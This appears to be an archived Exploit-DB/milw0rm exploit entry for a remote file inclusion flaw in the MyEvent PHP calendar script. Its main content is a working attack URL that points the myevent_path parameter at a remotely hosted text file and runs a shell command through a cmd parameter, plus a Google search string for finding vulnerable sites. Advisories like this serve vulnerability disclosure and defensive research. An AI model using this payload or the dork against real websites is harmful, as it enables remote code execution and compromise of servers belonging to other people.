MyEvent <= 1.3 myevent_path Remote File Inclusion Vulnerability

2006-04-17T00:00:00
ID EDB-ID:1687
Type exploitdb
Reporter botan
Modified 2006-04-17T00:00:00

Description

MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php" 

http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a 

# milw0rm.com [2006-04-17]